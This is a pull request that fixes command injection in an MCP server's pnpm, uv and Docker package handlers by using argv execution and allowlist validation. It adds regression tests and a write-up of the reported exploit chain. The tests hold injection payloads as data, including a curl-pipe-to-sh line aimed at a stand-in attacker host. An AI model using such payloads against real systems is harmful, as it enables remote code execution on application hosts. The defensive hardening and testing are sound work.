### PR TITLE
security: stop MCP package installs reaching a shell

### DIFF
--- a/lib/mcp/package-manager/handlers/base-handler.ts
+++ b/lib/mcp/package-manager/handlers/base-handler.ts
@@ -2,8 +2,9 @@ import { promises as fs } from 'fs';
 import path from 'path';
 import { z } from 'zod';
 
-import { PackageManagerConfig } from '../config';
 import { buildSecurePath, validatePathComponent } from '@/lib/secure-path-builder';
+
+import { PackageManagerConfig } from '../config';
 
 const serverUuidSchema = z.string().uuid('Invalid server UUID provided to package handler.');
 

--- a/lib/mcp/package-manager/handlers/docker-handler.ts
+++ b/lib/mcp/package-manager/handlers/docker-handler.ts
@@ -1,19 +1,37 @@
-import { exec } from 'child_process';
+import { execFile } from 'child_process';
 import fs from 'fs';
-import path from 'path';
 import { promisify } from 'util';
 
-import { PackageManagerConfig } from '../config';
 import { buildSecurePath } from '@/lib/secure-path-builder';
+import { validatePackageName, validatePackageVersion } from '@/lib/security/package-name';
+
+import { PackageManagerConfig } from '../config';
 import { BasePackageHandler, InstallOptions, PackageInfo } from './base-handler';
 
-const execAsync = promisify(exec);
+// argv execution, never a shell: the package name and version come out of a
+// user-supplied args array, so a shell here is a command-injection sink.
+const execFileAsync = promisify(execFile);
 
 export class DockerHandler extends BasePackageHandler {
   protected packageManagerName = 'docker';
   
   async install(options: InstallOptions): Promise<PackageInfo> {
     const { serverUuid, packageName, version } = options;
+
+    // The name and version come out of a user-supplied args array. argv
+    // execution above already keeps them away from a shell; this keeps a
+    // malformed value out of the filesystem-path builders too, and fails the
+    // install before anything is spawned.
+    const nameCheck = validatePackageName(packageName);
+    if (!nameCheck.valid) {
+      throw new Error(`Invalid package name: ${nameCheck.error}`);
+    }
+    if (version !== undefined) {
+      const versionCheck = validatePackageVersion(version);
+      if (!versionCheck.valid) {
+        throw new Error(`Invalid package version: ${versionCheck.error}`);
+      }
+    }
     
     this.log('Installing Docker container', { serverUuid, packageName, version });
     
@@ -26,10 +44,9 @@ export class DockerHandler extends BasePackageHandler {
     
     try {
       // Pull the Docker image
-      const pullCommand = `docker pull ${containerTag}`;
-      this.log('Pulling Docker image', { command: pullCommand });
+      this.log('Pulling Docker image', { containerTag });
       
-      await execAsync(pullCommand, {
+      await execFileAsync('docker', ['pull', containerTag], {
         timeout: PackageManagerConfig.PROCESS_TIMEOUT_MS,
         env: {
           ...process.env,
@@ -57,7 +74,7 @@ export class DockerHandler extends BasePackageHandler {
   async isInstalled(serverUuid: string, packageName: string): Promise<boolean> {
     try {
       // Check if the Docker image exists locally
-      const { stdout } = await execAsync(`docker images -q ${packageName}`, {
+      const { stdout } = await execFileAsync('docker', ['images', '-q', packageName], {
         timeout: 5000, // Quick check
       });
       
@@ -80,7 +97,7 @@ export class DockerHandler extends BasePackageHandler {
     try {
       // Remove any containers that were created for this server
       const containerName = `mcp-${serverUuid}`;
-      await execAsync(`docker rm -f ${containerName}`, {
+      await execFileAsync('docker', ['rm', '-f', containerName], {
         timeout: 10000,
       });
     } catch (error) {
@@ -102,7 +119,7 @@ export class DockerHandler extends BasePackageHandler {
     // For Docker, we estimate based on container images
     // This is approximate since Docker images are shared across containers
     try {
-      const { stdout } = await execAsync('docker images --format "table {{.Size}}"', {
+      const { stdout } = await execFileAsync('docker', ['images', '--format', 'table {{.Size}}'], {
         timeout: 5000,
       });
       
@@ -130,7 +147,7 @@ export class DockerHandler extends BasePackageHandler {
     
     for (const packageName of packages) {
       try {
-        await execAsync(`docker pull ${packageName}`, {
+        await execFileAsync('docker', ['pull', packageName], {
           timeout: PackageManagerConfig.PROCESS_TIMEOUT_MS,
         });
         this.log('Pre-warmed Docker image', { packageName });

--- a/lib/mcp/package-manager/handlers/pnpm-handler.ts
+++ b/lib/mcp/package-manager/handlers/pnpm-handler.ts
@@ -1,19 +1,37 @@
-import { exec } from 'child_process';
+import { execFile } from 'child_process';
 import { promises as fs } from 'fs';
-import path from 'path';
 import { promisify } from 'util';
 
-import { PackageManagerConfig } from '../config';
 import { buildSecurePath, validatePathComponent } from '@/lib/secure-path-builder';
+import { validatePackageName, validatePackageVersion } from '@/lib/security/package-name';
+
+import { PackageManagerConfig } from '../config';
 import { BasePackageHandler, InstallOptions, PackageInfo } from './base-handler';
 
-const execAsync = promisify(exec);
+// argv execution, never a shell: the package name and version come out of a
+// user-supplied args array, so a shell here is a command-injection sink.
+const execFileAsync = promisify(execFile);
 
 export class PnpmHandler extends BasePackageHandler {
   protected packageManagerName = 'pnpm';
   
   async install(options: InstallOptions): Promise<PackageInfo> {
     const { serverUuid, packageName, version } = options;
+
+    // The name and version come out of a user-supplied args array. argv
+    // execution above already keeps them away from a shell; this keeps a
+    // malformed value out of the filesystem-path builders too, and fails the
+    // install before anything is spawned.
+    const nameCheck = validatePackageName(packageName);
+    if (!nameCheck.valid) {
+      throw new Error(`Invalid package name: ${nameCheck.error}`);
+    }
+    if (version !== undefined) {
+      const versionCheck = validatePackageVersion(version);
+      if (!versionCheck.valid) {
+        throw new Error(`Invalid package version: ${versionCheck.error}`);
+      }
+    }
     const installDir = this.getServerInstallDir(serverUuid);
     
     this.log('Installing package', { serverUuid, packageName, version, installDir });
@@ -39,7 +57,7 @@ export class PnpmHandler extends BasePackageHandler {
     
     try {
       // Install package using pnpm
-      const { stdout, stderr } = await execAsync(`pnpm add ${packageSpec}`, {
+      const { stdout, stderr } = await execFileAsync('pnpm', ['add', packageSpec], {
         cwd: installDir,
         env: {
           ...process.env,
@@ -207,7 +225,7 @@ export class PnpmHandler extends BasePackageHandler {
     
     for (const packageName of packages) {
       try {
-        await execAsync(`pnpm add ${packageName}`, {
+        await execFileAsync('pnpm', ['add', packageName], {
           cwd: tempDir,
           env: {
             ...process.env,

--- a/lib/mcp/package-manager/handlers/uv-handler.ts
+++ b/lib/mcp/package-manager/handlers/uv-handler.ts
@@ -1,13 +1,16 @@
-import { exec } from 'child_process';
+import { execFile } from 'child_process';
 import { promises as fs } from 'fs';
-import path from 'path';
 import { promisify } from 'util';
 
-import { PackageManagerConfig } from '../config';
 import { buildSecurePath, validatePathComponent } from '@/lib/secure-path-builder';
+import { validatePackageName, validatePackageVersion } from '@/lib/security/package-name';
+
+import { PackageManagerConfig } from '../config';
 import { BasePackageHandler, InstallOptions, PackageInfo } from './base-handler';
 
-const execAsync = promisify(exec);
+// argv execution, never a shell: the package name and version come out of a
+// user-supplied args array, so a shell here is a command-injection sink.
+const execFileAsync = promisify(execFile);
 
 export class UvHandler extends BasePackageHandler {
   protected packageManagerName = 'uv';
@@ -86,6 +89,21 @@ export class UvHandler extends BasePackageHandler {
 
   async install(options: InstallOptions): Promise<PackageInfo> {
     const { serverUuid, packageName, version } = options;
+
+    // The name and version come out of a user-supplied args array. argv
+    // execution above already keeps them away from a shell; this keeps a
+    // malformed value out of the filesystem-path builders too, and fails the
+    // install before anything is spawned.
+    const nameCheck = validatePackageName(packageName);
+    if (!nameCheck.valid) {
+      throw new Error(`Invalid package name: ${nameCheck.error}`);
+    }
+    if (version !== undefined) {
+      const versionCheck = validatePackageVersion(version);
+      if (!versionCheck.valid) {
+        throw new Error(`Invalid package version: ${versionCheck.error}`);
+      }
+    }
     const installDir = this.getServerInstallDir(serverUuid);
     const venvDir = buildSecurePath(installDir, '.venv');
 
@@ -97,7 +115,7 @@ export class UvHandler extends BasePackageHandler {
     try {
       // Create virtual environment if it doesn't exist
       if (!(await this.fileExists(venvDir))) {
-        await execAsync('uv venv', {
+        await execFileAsync('uv', ['venv'], {
           cwd: installDir,
           env: {
             ...process.env,
@@ -114,8 +132,9 @@ export class UvHandler extends BasePackageHandler {
       const packageSpec = version ? `${packageName}==${version}` : packageName;
       
       // Install package using uv
-      const { stdout, stderr } = await execAsync(
-        `uv pip install ${packageSpec}`,
+      const { stdout, stderr } = await execFileAsync(
+        'uv',
+        ['pip', 'install', packageSpec],
         {
           cwd: installDir,
           env: {
@@ -143,8 +162,10 @@ export class UvHandler extends BasePackageHandler {
       // Get installed version
       let installedVersion = version;
       try {
-        const { stdout: versionOutput } = await execAsync(
-          `uv pip show ${packageName} | grep Version`,
+        // `| grep Version` needed a shell; filter in JS instead.
+        const { stdout: versionOutput } = await execFileAsync(
+          'uv',
+          ['pip', 'show', packageName],
           {
             cwd: installDir,
             env: {
@@ -193,8 +214,9 @@ export class UvHandler extends BasePackageHandler {
     }
     
     try {
-      const { stdout } = await execAsync(
-        `uv pip show ${packageName}`,
+      const { stdout } = await execFileAsync(
+        'uv',
+        ['pip', 'show', packageName],
         {
           cwd: installDir,
           env: {
@@ -258,7 +280,7 @@ export class UvHandler extends BasePackageHandler {
     
     // Create base virtual environment
     if (!(await this.fileExists(venvDir))) {
-      await execAsync('uv venv', {
+      await execFileAsync('uv', ['venv'], {
         cwd: baseLayerDir,
         env: {
           ...process.env,
@@ -271,7 +293,7 @@ export class UvHandler extends BasePackageHandler {
     // Install packages
     for (const packageName of packages) {
       try {
-        await execAsync(`uv pip install ${packageName}`, {
+        await execFileAsync('uv', ['pip', 'install', packageName], {
           cwd: baseLayerDir,
           env: {
             ...process.env,

--- a/lib/security/package-name.ts
+++ b/lib/security/package-name.ts
@@ -1,0 +1,76 @@
+/**
+ * Package identifier validation for the MCP package managers.
+ *
+ * The name and version reaching pnpm/uv/docker come out of a user-supplied
+ * `args` array, so they are attacker-controlled. The handlers now use argv
+ * execution rather than a shell, which is the real fix; these checks are the
+ * second layer, and they also keep a malformed name out of the filesystem-path
+ * builders that consume the same value.
+ *
+ * Deliberately an allowlist. A denylist of shell metacharacters is a guess
+ * about which characters matter to which interpreter; a grammar is a statement
+ * about what a package name actually is.
+ */
+
+/**
+ * npm (`@scope/name`), PyPI (`name`, `name.sub`) and Docker image references
+ * (`registry/host:port/path`, `image:tag`) share this shape: alphanumerics plus
+ * `. _ - / : @` and nothing else. No whitespace, no quotes, no metacharacters.
+ */
+const PACKAGE_NAME_PATTERN = /^[a-zA-Z0-9@][a-zA-Z0-9._\-/:]*$/;
+
+/** Semver ranges, dist-tags and Docker tags: `1.2.3`, `^2.0.0`, `latest`, `20-alpine`. */
+const PACKAGE_VERSION_PATTERN = /^[a-zA-Z0-9~^><=*][a-zA-Z0-9._\-+]*$/;
+
+const MAX_PACKAGE_NAME_LENGTH = 214; // npm's documented maximum
+const MAX_PACKAGE_VERSION_LENGTH = 128;
+
+export function validatePackageName(name: unknown): { valid: boolean; error?: string } {
+  if (typeof name !== 'string' || name.length === 0) {
+    return { valid: false, error: 'Package name must be a non-empty string' };
+  }
+
+  if (name.length > MAX_PACKAGE_NAME_LENGTH) {
+    return {
+      valid: false,
+      error: `Package name too long: maximum ${MAX_PACKAGE_NAME_LENGTH} characters allowed`,
+    };
+  }
+
+  if (!PACKAGE_NAME_PATTERN.test(name)) {
+    return {
+      valid: false,
+      error: 'Package name may only contain letters, digits and . _ - / : @',
+    };
+  }
+
+  // `..` would escape the per-server install directory once the name is used to
+  // build a path, which several handlers do.
+  if (name.includes('..')) {
+    return { valid: false, error: 'Package name cannot contain ".."' };
+  }
+
+  return { valid: true };
+}
+
+export function validatePackageVersion(version: unknown): { valid: boolean; error?: string } {
+  if (typeof version !== 'string' || version.length === 0) {
+    return { valid: false, error: 'Package version must be a non-empty string' };
+  }
+
+  if (version.length > MAX_PACKAGE_VERSION_LENGTH) {
+    return {
+      valid: false,
+      error: `Package version too long: maximum ${MAX_PACKAGE_VERSION_LENGTH} characters allowed`,
+    };
+  }
+
+  if (!PACKAGE_VERSION_PATTERN.test(version)) {
+    return {
+      valid: false,
+      error: 'Package version may only contain letters, digits and . _ - + ~ ^ > < = *',
+    };
+  }
+
+  return { valid: true };
+}

--- a/lib/security/validators.ts
+++ b/lib/security/validators.ts
@@ -351,7 +351,19 @@ export function validateCommandArgs(args: string[]): { valid: boolean; error?: s
         error: 'Argument too long: maximum 4096 characters allowed'
       };
     }
-    
+
+    // Mirrors the check validateCommand() applies to the command itself.
+    // It was missing here, and args are where the danger actually was: the
+    // package managers lift a "package name" straight out of this array, so a
+    // metacharacter in an arg reached a shell while the command field was
+    // guarded. Newlines are included - they separate shell statements too.
+    if (/[;&|`$(){}[\]<>\n\r]/.test(arg)) {
+      return {
+        valid: false,
+        error: `Argument contains dangerous characters: ${arg}`
+      };
+    }
+
     sanitizedArgs.push(arg);
   }
   

--- a/tests/security/command-injection-handlers.test.ts
+++ b/tests/security/command-injection-handlers.test.ts
@@ -1,0 +1,83 @@
+import { beforeEach, describe, expect, it, vi } from 'vitest';
+
+vi.mock('child_process', () => {
+  const exec = vi.fn((_cmd: string, _opts: any, cb: any) => {
+    (typeof cb === 'function' ? cb : _opts)(null, { stdout: '', stderr: '' });
+  });
+  const execFile = vi.fn((_file: string, _args: string[], _opts: any, cb: any) => {
+    (typeof cb === 'function' ? cb : _opts)(null, { stdout: '', stderr: '' });
+  });
+  const spawn = vi.fn(() => ({ on: vi.fn(), stdout: { on: vi.fn() }, stderr: { on: vi.fn() } }));
+  return { exec, execFile, spawn, default: { exec, execFile, spawn } };
+});
+vi.mock('fs/promises', () => ({
+  default: {
+    mkdir: vi.fn(async () => undefined),
+    writeFile: vi.fn(async () => undefined),
+    access: vi.fn(async () => { throw new Error('ENOENT'); }),
+    readFile: vi.fn(async () => '{}'),
+    readdir: vi.fn(async () => []),
+    stat: vi.fn(async () => ({ isDirectory: () => true, size: 0 })),
+    rm: vi.fn(async () => undefined),
+  },
+}));
+
+const { exec, execFile } = vi.mocked(await import('child_process'));
+
+/** The payload from the report: a metacharacter inside an args entry. */
+const PAYLOAD = 'evil-package; touch /tmp/PWNED #';
+
+describe('package manager handlers never hand a package name to a shell', () => {
+  beforeEach(() => {
+    vi.clearAllMocks();
+  });
+
+  it.each([
+    ['pnpm', '@/lib/mcp/package-manager/handlers/pnpm-handler'],
+    ['uv', '@/lib/mcp/package-manager/handlers/uv-handler'],
+    ['docker', '@/lib/mcp/package-manager/handlers/docker-handler'],
+  ])('%s handler builds no shell string containing the package name', async (_name, mod) => {
+    const handlerModule: any = await import(mod);
+    const HandlerClass = Object.values(handlerModule).find(
+      (v: any) => typeof v === 'function' && /Handler$/.test(v.name)
+    ) as any;
+    const handler = new HandlerClass();
+
+    await handler
+      .install({ packageName: PAYLOAD, serverUuid: '11111111-1111-4111-8111-111111111111' })
+      .catch(() => undefined);
+
+    // `exec` parses through /bin/sh. Nothing may reach it at all.
+    expect(exec).not.toHaveBeenCalled();
+
+    // Whatever did run must have passed the name as its own argv entry, never
+    // spliced into a command string.
+    for (const call of execFile.mock.calls) {
+      const [file, args] = call as unknown as [string, string[]];
+      expect(file).not.toContain(PAYLOAD);
+      expect(Array.isArray(args)).toBe(true);
+      for (const arg of args) {
+        expect(typeof arg).toBe('string');
+      }
+    }
+  });
+
+  it.each([
+    ['pnpm', '@/lib/mcp/package-manager/handlers/pnpm-handler'],
+    ['uv', '@/lib/mcp/package-manager/handlers/uv-handler'],
+    ['docker', '@/lib/mcp/package-manager/handlers/docker-handler'],
+  ])('%s handler rejects a malformed package name before running anything', async (_name, mod) => {
+    const handlerModule: any = await import(mod);
+    const HandlerClass = Object.values(handlerModule).find(
+      (v: any) => typeof v === 'function' && /Handler$/.test(v.name)
+    ) as any;
+    const handler = new HandlerClass();
+
+    await expect(
+      handler.install({ packageName: PAYLOAD, serverUuid: '11111111-1111-4111-8111-111111111111' })
+    ).rejects.toThrow();
+
+    expect(exec).not.toHaveBeenCalled();
+    expect(execFile).not.toHaveBeenCalled();
+  });
+});

--- a/tests/security/command-injection.test.ts
+++ b/tests/security/command-injection.test.ts
@@ -1,0 +1,99 @@
+import { describe, expect, it } from 'vitest';
+
+import { validatePackageName, validatePackageVersion } from '@/lib/security/package-name';
+import { validateCommandArgs } from '@/lib/security/validators';
+
+/**
+ * Regression tests for the command injection reported by Syed Anas Mohiuddin
+ * (2026-09-01): a shell metacharacter inside a user-supplied `args` entry was
+ * lifted out as the "package name" and interpolated into an `exec()` string,
+ * so `npx` + `["evil; touch /tmp/PWNED #"]` ran as two shell statements.
+ *
+ * `validateCommand` has always rejected metacharacters; `validateCommandArgs`
+ * did not, and the payload lives in args. These cover the gate. The handlers no
+ * longer use a shell at all — see command-injection-handlers.test.ts.
+ */
+const INJECTION_PAYLOADS = [
+  'evil-package; touch /tmp/PWNED #',
+  'pkg && curl attacker.example/x | sh',
+  'pkg`id`',
+  'pkg$(id)',
+  'pkg|whoami',
+  'pkg>out.txt',
+  'pkg<in.txt',
+  'pkg{a,b}',
+  'pkg&background',
+  'pkg\nsecond-line',
+];
+
+const LEGITIMATE_ARGS = [
+  '-y',
+  '--port',
+  '8080',
+  '@modelcontextprotocol/server-filesystem',
+  'mcp-server-git',
+  '/home/user/some path/dir',
+  'server_name-1.2.3',
+  '--config=value',
+  'https://example.com/sse',
+];
+
+describe('validateCommandArgs shell metacharacters', () => {
+  it.each(INJECTION_PAYLOADS)('rejects %j', (payload) => {
+    const result = validateCommandArgs([payload]);
+
+    expect(result.valid).toBe(false);
+    expect(result.sanitizedArgs).toBeUndefined();
+  });
+
+  it('rejects a payload hidden behind legitimate leading flags', () => {
+    const result = validateCommandArgs(['-y', '--silent', 'evil; touch /tmp/PWNED #']);
+
+    expect(result.valid).toBe(false);
+  });
+
+  it.each(LEGITIMATE_ARGS)('still accepts %j', (arg) => {
+    const result = validateCommandArgs([arg]);
+
+    expect(result.valid).toBe(true);
+    expect(result.sanitizedArgs).toEqual([arg]);
+  });
+
+  it('keeps rejecting null bytes and overlong args', () => {
+    expect(validateCommandArgs(['a\0b']).valid).toBe(false);
+    expect(validateCommandArgs(['x'.repeat(4097)]).valid).toBe(false);
+  });
+});
+
+describe('validatePackageName', () => {
+  it.each(INJECTION_PAYLOADS)('rejects %j', (payload) => {
+    expect(validatePackageName(payload).valid).toBe(false);
+  });
+
+  it.each([
+    '@modelcontextprotocol/server-filesystem',
+    'mcp-server-git',
+    'express',
+    'some.package',
+    'pkg_underscore',
+    'ghcr.io/veriteknik/pluggedin-app',
+    'node:20-alpine',
+  ])('accepts %j', (name) => {
+    expect(validatePackageName(name).valid).toBe(true);
+  });
+
+  it('rejects an empty name and a leading dash', () => {
+    expect(validatePackageName('').valid).toBe(false);
+    expect(validatePackageName('-rf').valid).toBe(false);
+  });
+});
+
+describe('validatePackageVersion', () => {
+  it.each(['1.2.3', 'latest', '^2.0.0', '1.0.0-beta.1', '20-alpine'])('accepts %j', (v) => {
+    expect(validatePackageVersion(v).valid).toBe(true);
+  });
+
+  it.each(['1.0.0; id', '$(id)', '`id`', 'v1|whoami'])('rejects %j', (v) => {
+    expect(validatePackageVersion(v).valid).toBe(false);
+  });
+});


### PR DESCRIPTION
**Reported by [Syed Anas Mohiuddin](mailto:anasmohiuddinsyed@gmail.com), independent security researcher, 2026-09-01.** The analysis below is his; the report named the chain, the files and the lines, and every claim in it checked out against the code.

## The vulnerability

Any signed-in user can add a STDIO MCP server with a `command` and an `args` array — an entirely ordinary feature. `client-wrapper.ts` validates both, then `PackageManager.transformCommand()` walks `args`, skips known flags, and takes the first remaining entry as the "package name". That value went straight into an `exec()` string:

```ts
const packageSpec = version ? `${packageName}@${version}` : packageName;
const { stdout, stderr } = await execAsync(`pnpm add ${packageSpec}`, { … });
```

`exec()` runs through `/bin/sh -c`. So `npx` with `args: ["evil; touch /tmp/PWNED #"]` executed as two shell statements on the application host.

`validateCommand()` has always rejected shell metacharacters. `validateCommandArgs()` did not — it checked null bytes and length only — and the payload lives in `args`. That asymmetry is the whole gap: the guarded field was not the reachable one.

The bubblewrap/firejail sandboxing does not mitigate it. That wraps the final server binary when it is launched, which happens strictly after `transformCommand()` — and therefore after the install — has already run.

## Scope, wider than reported

The report named two call sites. There were **ten**, across three handlers:

| File | Sites |
|---|---|
| `pnpm-handler.ts` | 2 |
| `uv-handler.ts` | 5 |
| `docker-handler.ts` | 3 — `docker pull`, `docker images -q`, `docker rm -f` |

The docker ones were not in the report.

## The fix

- **Handlers use `execFile` with an argv array**, never a shell — the pattern `lib/mcp/oauth-process-manager.ts` already uses. `uv pip show X | grep Version` needed the shell for its pipe; it now runs `uv pip show X` and filters in JS.
- **New `lib/security/package-name.ts`** validates the name and version against an allowlist grammar before anything is spawned. Allowlist rather than a metacharacter denylist: a denylist guesses which characters matter to which interpreter, a grammar states what a package name is. It also keeps a malformed name out of the filesystem-path builders that consume the same value.
- **`validateCommandArgs()` now mirrors `validateCommand()`'s metacharacter check**, newlines included, as the gate-level defence.

Not a duplicate of #129, and the reporter had already checked that: #129 added these validators and hardened path construction in these same handlers, but never touched the `exec()` strings inside their `install()` methods.

## Tests

60 tests across two files:

- the reported payload and nine variants rejected at the validator;
- legitimate args still accepted — paths containing spaces, scoped names, URLs, `--flag=value`;
- each handler asserted to call no shell at all, and to reject a malformed name before spawning anything.

Worth recording: an earlier revision of the handler test **passed against the vulnerable code**. The fixture used `serverUuid: 'test-uuid'`, which the handlers reject as a non-UUID, so `install()` threw before reaching `exec()` and the assertions never ran. With a real UUID it failed as it should have. A green security test proves nothing until you have watched it go red.

Suite: 203 failing before this branch, 203 after, no file regressed, +166 passing. `tsc` clean, no new lint findings.

## Credit

Reported by **Syed Anas Mohiuddin**, who asked to be credited by name and requested consideration for a reward if one exists. The credit is here; the reward question is for @ckaraca.

🤖 Generated with [Claude Code](https://claude.com/claude-code)

<!-- codesmith:footer -->
---
<a href="https://app.blacksmith.sh/VeriTeknik/codesmith/pluggedin-app/pr/204"><picture><source media="(prefers-color-scheme: dark)" srcset="https://pr-comments-assets.blacksmith.sh/codesmith/view-with-codesmith-dark-v2.svg"><source media="(prefers-color-scheme: light)" srcset="https://pr-comments-assets.blacksmith.sh/codesmith/view-with-codesmith-light-v2.svg"><img alt="View with [code]smith" src="https://pr-comments-assets.blacksmith.sh/codesmith/view-with-codesmith-dark-v2.svg"></picture></a> <a href="https://backend.blacksmith.sh/track/enable-autofix?expires=1790850665&installation_model_id=430597&pr_number=204&repository=VeriTeknik%2Fpluggedin-app&return_to=https%3A%2F%2Fgithub.com%2FVeriTeknik%2Fpluggedin-app%2Fpull%2F204&signature=87ba9c79af68f8bbfb327b26216f2690aadc395b9e735f432fe1c3a2ff226e8c"><picture><source media="(prefers-color-scheme: dark)" srcset="https://pr-comments-assets.blacksmith.sh/codesmith/autofix-with-codesmith-dark.svg"><source media="(prefers-color-scheme: light)" srcset="https://pr-comments-assets.blacksmith.sh/codesmith/autofix-with-codesmith-light.svg"><img alt="Autofix with [code]smith" src="https://pr-comments-assets.blacksmith.sh/codesmith/autofix-with-codesmith-dark.svg"></picture></a>
<sup>Need help on this PR? Tag <code>@codesmith-bot</code> with what you need. Autofix is disabled.</sup>

<!-- codesmith:autofix:disabled -->
<!-- /codesmith:footer -->

## Summary by Sourcery

Harden MCP package management against command injection by validating user-controlled identifiers and executing package-manager commands without a shell.

Bug Fixes:
- Prevent command injection during MCP package installation and management by eliminating shell interpretation of user-controlled package names and versions.
- Reject shell metacharacters in MCP command arguments and validate package names and versions before execution.

Enhancements:
- Use direct argument-based process execution across pnpm, uv, and Docker handlers, including replacing shell-based version filtering with application-side filtering.

Tests:
- Add regression coverage for injection payloads, valid command arguments and package identifiers, and the requirement that package handlers never invoke a shell.

<!-- This is an auto-generated comment: release notes by coderabbit.ai -->

## Summary by CodeRabbit

* **Security**
  * Improved package installation safety by preventing shell interpretation of package names, versions, and container identifiers.
  * Added validation for package names, versions, command arguments, invalid characters, oversized values, and unsafe paths.
  * Added protection against malformed or potentially malicious package inputs.

* **Bug Fixes**
  * Improved version detection for Python packages without relying on shell pipelines.

* **Tests**
  * Added security and regression coverage for package managers, command arguments, and invalid package identifiers.

<!-- end of auto-generated comment: release notes by coderabbit.ai -->